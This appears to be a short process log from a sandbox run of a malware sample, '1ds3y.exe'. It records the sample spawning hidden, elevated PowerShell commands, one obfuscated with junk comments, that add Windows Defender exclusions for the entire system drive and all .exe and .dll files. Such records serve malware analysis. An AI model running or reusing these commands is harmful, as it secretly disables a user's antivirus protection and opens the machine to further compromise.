1ds3y.exe "C:\Users\test22\AppData\Local\Temp\1ds3y.exe"
1880explorer.exe C:\Windows\Explorer.EXE
1236powershell.exe powershell "Start-Process <#cafhuybsja#> powershell <#cafhuybsja#> -Verb <#cafhuybsja#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
2572powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
2700